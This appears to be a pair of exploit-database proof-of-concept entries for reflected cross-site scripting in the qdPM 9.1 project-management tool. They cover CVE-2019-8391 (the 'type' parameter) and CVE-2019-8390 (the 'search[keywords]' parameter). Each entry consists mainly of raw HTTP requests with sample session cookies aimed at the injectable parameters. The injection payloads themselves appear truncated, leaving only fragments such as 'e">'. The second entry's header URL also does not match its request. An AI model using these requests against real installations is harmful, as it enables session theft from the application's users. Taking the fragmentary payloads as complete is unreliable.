=========================================================================================== # Exploit Title: qdPM 9.1 - 'type' XSS Injection # CVE: CVE-2019-8391. # Date: 14-02-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: http://qdpm.net # Software Link: http://qdpm.net/download-qdpm-free-project-management # Version: v9.1 # Category: Webapps # Tested on: Wamp64, @Win # Software description: Free project management tool for small team qdPM is a free web-based project management tool suitable for a small team working on multiple projects. It is fully configurable. You can easy manage Projects, Tasks and People. Customers interact using a Ticket System that is integrated into Task management. =========================================================================================== # POC - XSS # Parameters : type # Attack Pattern : tasks_columns_list # GET Request: http://localhost/qdpm/index.php/configuration =========================================================================================== GET /qdpm/index.php/configuration?type=tasks_columns_list HTTP/1.1 Referer: http://localhost/qdPM/ Cookie: qdPM8=se4u27u8rbs04mo61f138b5k3d; sidebar_closed=1 Host: localhost Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: */* =========================================================================================== # Exploit Title: qdPM 9.1 - 'search[keywords]' XSS Injection # CVE: CVE-2019-8390 # Date: 14-02-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: http://qdpm.net # Software Link: http://qdpm.net/download-qdpm-free-project-management # Version: v9.1 # Category: Webapps # Tested on: Wamp64, @Win # Software description: Free project management tool for small team qdPM is a free web-based project management tool suitable for a small team working on multiple projects. It is fully configurable. You can easy manage Projects, Tasks and People. Customers interact using a Ticket System that is integrated into Task management. =========================================================================================== # POC - XSS # Parameters : search[keywords] # Attack Pattern : e"> # POST Request : http://localhost/qdpm/index.php/configuration =========================================================================================== POST /qdpm/index.php/users HTTP/1.1 Content-Length: 73 Content-Type: application/x-www-form-urlencoded Referer: http://localhost/qdPM/ Cookie: qdPM8=se4u27u8rbs04mo61f138b5k3d; sidebar_closed=1 Host: localhost Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: */* search[keywords]=e">&search_by_extrafields[]=9